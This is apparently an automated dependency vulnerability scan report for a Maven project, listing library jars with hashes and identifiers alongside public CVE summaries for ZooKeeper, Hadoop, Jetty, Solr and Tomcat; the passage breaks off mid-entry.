SHA256:ffca72bc2a25bb2b0c80a58cee60530a78be17da739bb6c91a8c2e3584ca099e
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.antlr:antlr4-runtime:4.5.1-1  Confidence:Highest

calcite-core-1.13.0.jar

Description:

 Core Calcite APIs and engine.

File Path: /Users/Kevin/.m2/repository/org/apache/calcite/calcite-core/1.13.0/calcite-core-1.13.0.jar
MD5: 29b1ddb56d998c4503737088f49074e7
SHA1: 1e7995aa0afe4c27a12e7b320a2938dcf05d9581
SHA256:0cb6147c7c6373da536f5f856a307e36ea32b90951b90f88fe5bda335939fb97
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.calcite:calcite-core:1.13.0  Confidence:Highest

calcite-linq4j-1.13.0.jar

Description:

 Calcite APIs for LINQ (Language-Integrated Query) in Java

File Path: /Users/Kevin/.m2/repository/org/apache/calcite/calcite-linq4j/1.13.0/calcite-linq4j-1.13.0.jar
MD5: 6537b031565b9c7f0dea69953f93e0d6
SHA1: 96c814d27516cf48d439277300252bfb2b00486f
SHA256:1d172b70bb9a79848cf60e8149c7b6dfbc97b5bd1d2bd61919ae1f4009b718b3
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.calcite:calcite-linq4j:1.13.0  Confidence:Highest

avatica-core-1.10.0.jar

Description:

 JDBC driver framework.

File Path: /Users/Kevin/.m2/repository/org/apache/calcite/avatica/avatica-core/1.10.0/avatica-core-1.10.0.jar
MD5: de761b429df2ea4988155ba48fb8c225
SHA1: 82280b09d490c7e4981b5af2d79fcf55efbe6144
SHA256:1ba1dd30d5a84b694f652c2dc104497648bb4ee35cf51820ba294cb682c6b46d
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.calcite.avatica:avatica-core:1.10.0  Confidence:Highest

commons-exec-1.3.jar

Description:

 Apache Commons Exec is a library to reliably execute external processes from within the JVM.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/commons/commons-exec/1.3/commons-exec-1.3.jar
MD5: 8bb8fa2edfd60d5c7ed6bf9923d14aa8
SHA1: 8dfb9facd0830a27b1b5f29f84593f0aeee7773b
SHA256:cb49812dc1bfb0ea4f20f398bcae1a88c6406e213e67f7524fb10d4f8ad9347b
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.commons:commons-exec:1.3  Confidence:Highest

curator-client-2.8.0.jar

Description:

 Low-level API

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/curator/curator-client/2.8.0/curator-client-2.8.0.jar
MD5: c9092076fe5ede652f89465d6a859dfa
SHA1: 84feebaa8526f4984566f6a32f55d7689800acf9
SHA256:80ea85c2db916da0171c93c84418bad429b26b7be716abd331f670e269850dbb
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.curator:curator-client:2.8.0  Confidence:Highest

curator-framework-2.8.0.jar

Description:

 High-level API that greatly simplifies using ZooKeeper.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/curator/curator-framework/2.8.0/curator-framework-2.8.0.jar
MD5: 1ef0e8c00272ceba66741ee16773c5cd
SHA1: f8edc9156084ad19ae50ae5958bf218a08351834
SHA256:955a367d71304944018f1d0cb0ab875ae6957705458b0c66798fb19bf7bc1823
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache:zookeeper:2.8.0  Confidence:Low  
  • maven: org.apache.curator:curator-framework:2.8.0  Confidence:Highest

CVE-2016-5017  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

Buffer overflow in the C cli shell in Apache Zookeeper before 3.4.9 and 3.5.x before 3.5.3, when using the "cmd:" batch mode syntax, allows attackers to have unspecified impact via a long command string.

Vulnerable Software & Versions:

CVE-2018-8012  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-285 Improper Authorization

No authentication/authorization is enforced when a server attempts to join a quorum in Apache ZooKeeper before 3.4.10, and 3.5.0-alpha through 3.5.3-beta. As a result an arbitrary end point could join the cluster and begin propagating counterfeit changes to the leader.

Vulnerable Software & Versions:

curator-recipes-2.8.0.jar

Description:

 All of the recipes listed on the ZooKeeper recipes doc (except two phase commit).

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/curator/curator-recipes/2.8.0/curator-recipes-2.8.0.jar
MD5: d0cda7ac1d3317646df990366d89110b
SHA1: c563e25fb37f85a6b029bc9746e75573640474fb
SHA256:c527e7fc5f88437ad90bed5f6227ee577a11b36550784d1c066c85d9324a3ca6
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.curator:curator-recipes:2.8.0  Confidence:Highest

hadoop-hdfs-2.7.4.jar

Description:

 Apache Hadoop HDFS

File Path: /Users/Kevin/.m2/repository/org/apache/hadoop/hadoop-hdfs/2.7.4/hadoop-hdfs-2.7.4.jar
MD5: e18f429b60662b724cad080b834717a3
SHA1: 3e1414e3ae47e97f66b2eb904d3ec6c50a3e29d0
SHA256:1f3c14c446cf1692b085952b5e186ee817d7aa3011440a38da86140fe1e3d815
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.hadoop:hadoop-hdfs:2.7.4  Confidence:Highest
  • cpe: cpe:/a:apache:hadoop:2.7.4  Confidence:Highest  

CVE-2017-15718  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-255 Credentials Management

The YARN NodeManager in Apache Hadoop 2.7.3 and 2.7.4 can leak the password for credential store provider used by the NodeManager to YARN Applications.

Vulnerable Software & Versions:

htrace-core-3.2.0-incubating.jar

File Path: /Users/Kevin/.m2/repository/org/apache/htrace/htrace-core/3.2.0-incubating/htrace-core-3.2.0-incubating.jar
MD5: 0b1b1a63aca83a11545de49218a251bf
SHA1: 8797cf3230f01e8724ef27a0ed565dabb6998c64
SHA256:508be2770ef8e83b5c32e19bb56d3fba2ee33c12f7fba25293582ad1595e30bb
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:fasterxml:jackson:3.2.0  Confidence:Low  
  • maven: org.apache.htrace:htrace-core:3.2.0-incubating  Confidence:Highest

httpcore-4.4.1.jar

Description:

 Apache HttpComponents Core (blocking I/O)

File Path: /Users/Kevin/.m2/repository/org/apache/httpcomponents/httpcore/4.4.1/httpcore-4.4.1.jar
MD5: 27bf6d5323a86a6115b607ce82512d6c
SHA1: f5aa318bda4c6c8d688c9d00b90681dcd82ce636
SHA256:dd1390c17d40f760f7e51bb20523a8d63deb69e94babeaf567eb76ecd2cad422
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.httpcomponents:httpcore:4.4.1  Confidence:Highest

httpmime-4.4.1.jar

Description:

 Apache HttpComponents HttpClient - MIME coded entities

File Path: /Users/Kevin/.m2/repository/org/apache/httpcomponents/httpmime/4.4.1/httpmime-4.4.1.jar
MD5: 678b75d71032e823480a41123b6b3ce2
SHA1: 2f8757f5ac5e38f46c794e5229d1f3c522e9b1df
SHA256:e6b8ca9e2b9d9e1fded549c0a3cb7471a431d83294342ae1618b876113a59840
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.httpcomponents:httpmime:4.4.1  Confidence:Highest

zookeeper-3.4.10.jar

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/zookeeper/zookeeper/3.4.10/zookeeper-3.4.10.jar
MD5: 550ce0afeb92ef4a75f194b143e23995
SHA1: 08eebdbb7a9df83e02eaa42d0e5da0b57bf2e4da
SHA256:caa38ce6b2f52c59c10b80f89abb544cc4279257805fc0c969010cbab1a11079
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.zookeeper:zookeeper:3.4.10  Confidence:Highest
  • cpe: cpe:/a:apache:zookeeper:3.4.10  Confidence:Low  

CVE-2018-8012  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-285 Improper Authorization

No authentication/authorization is enforced when a server attempts to join a quorum in Apache ZooKeeper before 3.4.10, and 3.5.0-alpha through 3.5.3-beta. As a result an arbitrary end point could join the cluster and begin propagating counterfeit changes to the leader.

Vulnerable Software & Versions:

jackson-core-asl-1.9.13.jar

Description:

 Jackson is a high-performance JSON processor (parser, generator)

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/codehaus/jackson/jackson-core-asl/1.9.13/jackson-core-asl-1.9.13.jar
MD5: 319c49a4304e3fa9fe3cd8dcfc009d37
SHA1: 3c304d70f42f832e0a86d45bd437f692129299a4
SHA256:440a9cb5ca95b215f953d3a20a6b1a10da1f09b529a9ddea5f8a4905ddab4f5a
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:fasterxml:jackson:1.9.13  Confidence:Low  
  • maven: org.codehaus.jackson:jackson-core-asl:1.9.13  Confidence:Highest

commons-compiler-2.7.6.jar

Description:

 Janino is a super-small, super-fast Java compiler.

License:

http://dist.codehaus.org/janino/new_bsd_license.txt
File Path: /Users/Kevin/.m2/repository/org/codehaus/janino/commons-compiler/2.7.6/commons-compiler-2.7.6.jar
MD5: b729cc841ca68ecf82dd8b035196a28a
SHA1: b71e76d942b33dfa26e4e3047ff2a774d1f917b4
SHA256:ef505581b345821e9c28c049745683514ec87642a50d06da605f60d9c8e38792
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.janino:commons-compiler:2.7.6  Confidence:Highest

janino-2.7.6.jar

Description:

 Janino is a super-small, super-fast Java compiler.

License:

http://dist.codehaus.org/janino/new_bsd_license.txt
File Path: /Users/Kevin/.m2/repository/org/codehaus/janino/janino/2.7.6/janino-2.7.6.jar
MD5: 887a4a895315470f4ddf3203ef4cb115
SHA1: 37fde5de7edd5d7ebe075f03f4c083df2ac73dd8
SHA256:8818cc9e4076d8c52f3a00cc7650caefeb3a40638cab9ff5fa8cfe188c74463d
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.janino:janino:2.7.6  Confidence:Highest

stax2-api-3.1.4.jar

Description:

 Stax2 API is an extension to the basic Stax 1.0 API that adds significant new functionality, such as a full-featured bi-directional validation interface and a high-performance Typed Access API.

License:

The BSD License: http://www.opensource.org/licenses/bsd-license.php
File Path: /Users/Kevin/.m2/repository/org/codehaus/woodstox/stax2-api/3.1.4/stax2-api-3.1.4.jar
MD5: c08e89de601b0a78f941b2c29db565c3
SHA1: ac19014b1e6a7c08aad07fe114af792676b685b7
SHA256:86d7c0b775a7c9b454cc6ba61d40a8eb3b99cc129f832eb9b977a3755b4b338e
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.woodstox:stax2-api:3.1.4  Confidence:Highest

woodstox-core-asl-4.4.1.jar

Description:

 Woodstox is a high-performance XML processor that implements Stax (JSR-173) and SAX2 APIs

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/codehaus/woodstox/woodstox-core-asl/4.4.1/woodstox-core-asl-4.4.1.jar
MD5: 1f53f91f117288fb2ef2e120f27e5498
SHA1: 84fee5eb1a4a1cefe65b6883c73b3fa83be3c1a1
SHA256:274fa403ed08c0d6f2f574dc1916adaaaec9a493e56d6442f8797ede620bca65
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.codehaus.woodstox:woodstox-core-asl:4.4.1  Confidence:Highest

jetty-io-9.3.14.v20161028.jar

Description:

 Jetty module for Jetty :: IO Utility

License:

http://www.apache.org/licenses/LICENSE-2.0, http://www.eclipse.org/org/documents/epl-v10.php
File Path: /Users/Kevin/.m2/repository/org/eclipse/jetty/jetty-io/9.3.14.v20161028/jetty-io-9.3.14.v20161028.jar
MD5: 4d3aefe94291b3701779aa33076d20e1
SHA1: 52d796b58c3a997e59e6b47c4bf022cedcba3514
SHA256:23e6676cf9de936f65214e6cef0e07ae5bd1ec4711fe40c3887b0ba3b0d4a7aa
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.eclipse.jetty:jetty-io:9.3.14.v20161028  Confidence:Highest

jetty-jmx-9.3.14.v20161028.jar

Description:

 JMX management artifact for jetty.

License:

http://www.apache.org/licenses/LICENSE-2.0, http://www.eclipse.org/org/documents/epl-v10.php
File Path: /Users/Kevin/.m2/repository/org/eclipse/jetty/jetty-jmx/9.3.14.v20161028/jetty-jmx-9.3.14.v20161028.jar
MD5: 7517599ae46f1f22491f6701beeeec41
SHA1: d4829a57973c36f117792455024684bb6a5202aa
SHA256:4514f891b993b7ef57c6c40c3c47f6b1b46039b0e1c3acd5e6f9c6234f55a089
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:jetty:jetty:9.3.14.v20161028  Confidence:Low  
  • maven: org.eclipse.jetty:jetty-jmx:9.3.14.v20161028  Confidence:Highest
  • cpe: cpe:/a:eclipse:jetty:9.3.14.v20161028  Confidence:Low  

CVE-2017-9735  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

Jetty through 9.4.x is prone to a timing channel in util/security/Password.java, which makes it easier for remote attackers to obtain access by observing elapsed times before rejection of incorrect passwords.

Vulnerable Software & Versions:

spatial4j-0.6.jar

Description:

 Spatial4j is a general purpose spatial / geospatial ASL licensed open-source Java library. Its core capabilities are 3-fold: to provide common geospatially-aware shapes, to provide distance calculations and other math, and to read shape formats like WKT and GeoJSON.

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/locationtech/spatial4j/spatial4j/0.6/spatial4j-0.6.jar
MD5: baaffe1b4800337f0856c6160c255c35
SHA1: 21b15310bddcfd8c72611c180f20cf23279809a3
SHA256:365c2904230f1fdf42de6fd81f21fd806f7e095d0395fa4449e1a2d6751861ea
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.locationtech.spatial4j:spatial4j:0.6  Confidence:Highest

noggit-0.8.jar

Description:

 Noggit is the world's fastest streaming JSON parser for Java.

License:

Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/noggit/noggit/0.8/noggit-0.8.jar
MD5: 6856f2ceab2dd7128595e4659d22d581
SHA1: ba4ad65a62d7dfcf97a8d42c82ae7d8824f9087f
SHA256:dd9901c7d72ffd97d952271e3c486ddc9c78dd25a74db69ddbf2670431c7c81f
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.noggit:noggit:0.8  Confidence:Highest

asm-commons-5.1.jar

File Path: /Users/Kevin/.m2/repository/org/ow2/asm/asm-commons/5.1/asm-commons-5.1.jar
MD5: 38839fb32c40f7f70986e9c282de0018
SHA1: 25d8a575034dd9cfcb375a39b5334f0ba9c8474e
SHA256:97b3786e1f55e74bddf8ad102bf50e33bbcbc1f6b7fd7b36f0bbbb25cd4981be
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.ow2.asm:asm-commons:5.1  Confidence:Highest

jcl-over-slf4j-1.7.7.jar

Description:

 JCL 1.1.1 implemented over SLF4J

File Path: /Users/Kevin/.m2/repository/org/slf4j/jcl-over-slf4j/1.7.7/jcl-over-slf4j-1.7.7.jar
MD5: 32ad130f946ef0460af416397b7fc7b7
SHA1: 56003dcd0a31deea6391b9e2ef2f2dc90b205a92
SHA256:c6472b5950e1c23202e567c6334e4832d1db46fad604b7a0d7af71d4a014bce2
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:slf4j:slf4j:1.7.7  Confidence:Low  
  • maven: org.slf4j:jcl-over-slf4j:1.7.7  Confidence:Highest

solr-core-7.0.1.jar

Description:

 Apache Solr Core

File Path: /Users/Kevin/.m2/repository/org/apache/solr/solr-core/7.0.1/solr-core-7.0.1.jar
MD5: 5c9f20959e2f17b72b683b1a7098f7dd
SHA1: 8aa47f1a9b4758cf81eac0b545b5e99d84a977dc
SHA256:2626736f1494323e13a560c637ec80cc8d2b687253008013bbb86c07a769aac5
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache:solr:7.0.1  Confidence:Highest  
  • maven: org.apache.solr:solr-core:7.0.1  Confidence:Highest

CVE-2017-12629  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-611 Improper Restriction of XML External Entity Reference ('XXE')

Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before 7.1 by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr.

Vulnerable Software & Versions:

CVE-2018-1308  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-611 Improper Restriction of XML External Entity Reference ('XXE')

This vulnerability in Apache Solr 1.2 to 6.6.2 and 7.0.0 to 7.2.1 relates to an XML external entity expansion (XXE) in the `&dataConfig=<inlinexml>` parameter of Solr's DataImportHandler. It can be used as XXE using file/ftp/http protocols in order to read arbitrary local files from the Solr server or the internal network.

Vulnerable Software & Versions:

CVE-2018-8010  

Severity:Low
CVSS Score: 2.1 (AV:L/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-611 Improper Restriction of XML External Entity Reference ('XXE')

This vulnerability in Apache Solr 6.0.0 to 6.6.3, 7.0.0 to 7.3.0 relates to an XML external entity expansion (XXE) in Solr config files (solrconfig.xml, schema.xml, managed-schema). In addition, Xinclude functionality provided in these config files is also affected in a similar way. The vulnerability can be used as XXE using file/ftp/http protocols in order to read arbitrary local files from the Solr server or the internal network. Users are advised to upgrade to either Solr 6.6.4 or Solr 7.3.1 releases both of which address the vulnerability. Once upgrade is complete, no other steps are required. Those releases only allow external entities and Xincludes that refer to local files / zookeeper resources below the Solr instance directory (using Solr's ResourceLoader); usage of absolute URLs is denied. Keep in mind, that external entities and XInclude are explicitly supported to better structure config files in large installations. Before Solr 6 this was no problem, as config files were not accessible through the APIs.

Vulnerable Software & Versions:

CVE-2018-8026  

Severity:Low
CVSS Score: 2.1 (AV:L/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-611 Improper Restriction of XML External Entity Reference ('XXE')

This vulnerability in Apache Solr 6.0.0 to 6.6.4 and 7.0.0 to 7.3.1 relates to an XML external entity expansion (XXE) in Solr config files (currency.xml, enumsConfig.xml referred from schema.xml, TIKA parsecontext config file). In addition, Xinclude functionality provided in these config files is also affected in a similar way. The vulnerability can be used as XXE using file/ftp/http protocols in order to read arbitrary local files from the Solr server or the internal network. The manipulated files can be uploaded as configsets using Solr's API, allowing to exploit that vulnerability.

Vulnerable Software & Versions:

umlet-12.0.jar

License:

GNU GENERAL PUBLIC LICENSE: http://www.gnu.org/licenses/gpl.html
File Path: /Users/Kevin/.m2/repository/com/umlet/umlet/12.0/umlet-12.0.jar
MD5: 22b278ab918a3b1cce2cb1c10b44516a
SHA1: 507cb009ff54ce4186bc97f615e0dbaa4b546ba2
SHA256:68aec104c016b537de79f8eea8599d1ce1a1ea03a434ae56965d6b0360f0b054
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.umlet:umlet:12.0  Confidence:Highest

tomcat-juli-7.0.42.jar

Description:

 Tomcat Core Logging Package

License:

Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/tomcat/tomcat-juli/7.0.42/tomcat-juli-7.0.42.jar
MD5: ff8d7673a10e6aca13d2ac9ab91998a1
SHA1: f0049ac94514d69231c41ed96238efb94ffdd9cf
SHA256:0c044e6b88caceb49cf1dcb8ecbd0a8cfde574c5af3d5090143607618bd5f680
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache_software_foundation:tomcat:7.0.42  Confidence:Low  
  • maven: org.apache.tomcat:tomcat-juli:7.0.42  Confidence:Highest

tomcat-annotations-api-7.0.42.jar

Description:

 Annotations Package

License:

Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/tomcat/tomcat-annotations-api/7.0.42/tomcat-annotations-api-7.0.42.jar
MD5: 271b5ff84d2935a412289651cc7d9e9e
SHA1: 6fc6cc449c216e861c22ad00062ed1e6333179a5
SHA256:bc2c73407ecfe003f3da8ae64dc231bc9e882cae0f76c7e81b29a08f7647d8a4
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.tomcat:tomcat-annotations-api:7.0.42  Confidence:Highest

tomcat-api-7.0.42.jar

Description:

 Definition of interfaces shared by Catalina and Jasper

License:

Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/tomcat/tomcat-api/7.0.42/tomcat-api-7.0.42.jar
MD5: 55465a546c4a8528b0c9c7f009d6597b
SHA1: 9d67cf4dbe291c2de61b8e03445cfc87dcd6f580
SHA256:9647161c81c64bbf464f1a5e13cf96a5e2a27f61c4854cfb13464bc3e1bfb34b
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.tomcat:tomcat-api:7.0.42  Confidence:Highest
  • cpe: cpe:/a:apache_software_foundation:tomcat:7.0.42  Confidence:Low  
  • cpe: cpe:/a:apache_tomcat:apache_tomcat:7.0.42  Confidence:Low  
  • cpe: cpe:/a:apache:tomcat:7.0.42  Confidence:Highest  

CVE-2013-0346  

Severity:Low
CVSS Score: 2.1 (AV:L/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

** DISPUTED ** Apache Tomcat 7.x uses world-readable permissions for the log directory and its files, which might allow local users to obtain sensitive information by reading a file.  NOTE: One Tomcat distributor has stated "The tomcat log directory does not contain any sensitive information."

Vulnerable Software & Versions:

CVE-2013-4286  

Severity:Medium
CVSS Score: 5.8 (AV:N/AC:M/Au:N/C:P/I:P/A:N)
CWE: CWE-20 Improper Input Validation

Apache Tomcat before 6.0.39, 7.x before 7.0.47, and 8.x before 8.0.0-RC3, when an HTTP connector or AJP connector is used, does not properly handle certain inconsistent HTTP request headers, which allows remote attackers to trigger incorrect identification of a request's length and conduct request-smuggling attacks via (1) multiple Content-Length headers or (2) a Content-Length header and a "Transfer-Encoding: chunked" header.  NOTE: this vulnerability exists because of an incomplete fix for CVE-2005-2090.

Vulnerable Software & Versions:

CVE-2013-4322  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

Apache Tomcat before 6.0.39, 7.x before 7.0.50, and 8.x before 8.0.0-RC10 processes chunked transfer coding without properly handling (1) a large total amount of chunked data or (2) whitespace characters in an HTTP header value within a trailer field, which allows remote attackers to cause a denial of service by streaming data.  NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-3544.

Vulnerable Software & Versions:

CVE-2013-4590  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

Apache Tomcat before 6.0.39, 7.x before 7.0.50, and 8.x before 8.0.0-RC10 allows attackers to obtain "Tomcat internals" information by leveraging the presence of an untrusted web application with a context.xml, web.xml, *.jspx, *.tagx, or *.tld XML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.

Vulnerable Software & Versions:

CVE-2014-0050  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions.

Vulnerable Software & Versions:

CVE-2014-0075  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-189 Numeric Errors

Integer overflow in the parseChunkHeader function in java/org/apache/coyote/http11/filters/ChunkedInputFilter.java in Apache Tomcat before 6.0.40, 7.x before 7.0.53, and 8.x before 8.0.4 allows remote attackers to cause a denial of service (resource consumption) via a malformed chunk size in chunked transfer coding of a request during the streaming of data.

Vulnerable Software & Versions:

CVE-2014-0096  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

java/org/apache/catalina/servlets/DefaultServlet.java in the default servlet in Apache Tomcat before 6.0.40, 7.x before 7.0.53, and 8.x before 8.0.4 does not properly restrict XSLT stylesheets, which allows remote attackers to bypass security-manager restrictions and read arbitrary files via a crafted web application that provides an XML external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.

Vulnerable Software & Versions:

CVE-2014-0099  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-189 Numeric Errors

Integer overflow in java/org/apache/tomcat/util/buf/Ascii.java in Apache Tomcat before 6.0.40, 7.x before 7.0.53, and 8.x before 8.0.4, when operated behind a reverse proxy, allows remote attackers to conduct HTTP request smuggling attacks via a crafted Content-Length HTTP header.

Vulnerable Software & Versions:

CVE-2014-0119  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

Apache Tomcat before 6.0.40, 7.x before 7.0.54, and 8.x before 8.0.6 does not properly constrain the class loader that accesses the XML parser used with an XSLT stylesheet, which allows remote attackers to (1) read arbitrary files via a crafted web application that provides an XML external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, or (2) read files associated with different web applications on a single Tomcat instance via a crafted web application.

Vulnerable Software & Versions:

CVE-2014-0227  

Severity:Medium
CVSS Score: 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P)
CWE: CWE-19 Data Processing Errors

java/org/apache/coyote/http11/filters/ChunkedInputFilter.java in Apache Tomcat 6.x before 6.0.42, 7.x before 7.0.55, and 8.x before 8.0.9 does not properly handle attempts to continue reading data after an error has occurred, which allows remote attackers to conduct HTTP request smuggling attacks or cause a denial of service (resource consumption) by streaming data with malformed chunked transfer coding.

Vulnerable Software & Versions:

CVE-2014-0230  

Severity:High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CWE: CWE-399 Resource Management Errors

Apache Tomcat 6.x before 6.0.44, 7.x before 7.0.55, and 8.x before 8.0.9 does not properly handle cases where an HTTP response occurs before finishing the reading of an entire request body, which allows remote attackers to cause a denial of service (thread consumption) via a series of aborted upload attempts.

Vulnerable Software & Versions:

CVE-2014-7810  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-284 Improper Access Control

The Expression Language (EL) implementation in Apache Tomcat 6.x before 6.0.44, 7.x before 7.0.58, and 8.x before 8.0.16 does not properly consider the possibility of an accessible interface implemented by an inaccessible class, which allows attackers to bypass a SecurityManager protection mechanism via a web application that leverages use of incorrect privileges during EL evaluation.

Vulnerable Software & Versions:

CVE-2015-5174  

Severity:Medium
CVSS Score: 4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N)
CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Directory traversal vulnerability in RequestUtil.java in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.65, and 8.x before 8.0.27 allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application in a getResource, getResourceAsStream, or getResourcePaths call, as demonstrated by the $CATALINA_BASE/webapps directory.

Vulnerable Software & Versions:

CVE-2015-5345  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

The Mapper component in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.30, and 9.x before 9.0.0.M2 processes redirects before considering security constraints and Filters, which allows remote attackers to determine the existence of a directory via a URL that lacks a trailing / (slash) character.

Vulnerable Software & Versions:

CVE-2015-5346  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)

Session fixation vulnerability in Apache Tomcat 7.x before 7.0.66, 8.x before 8.0.30, and 9.x before 9.0.0.M2, when different session settings are used for deployments of multiple versions of the same web application, might allow remote attackers to hijack web sessions by leveraging use of a requestedSessionSSL field for an unintended request, related to CoyoteAdapter.java and Request.java.

Vulnerable Software & Versions:

CVE-2015-5351  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-352 Cross-Site Request Forgery (CSRF)

The (1) Manager and (2) Host Manager applications in Apache Tomcat 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 establish sessions and send CSRF tokens for arbitrary new requests, which allows remote attackers to bypass a CSRF protection mechanism by using a token.

Vulnerable Software & Versions:

CVE-2016-0706  

Severity:Medium
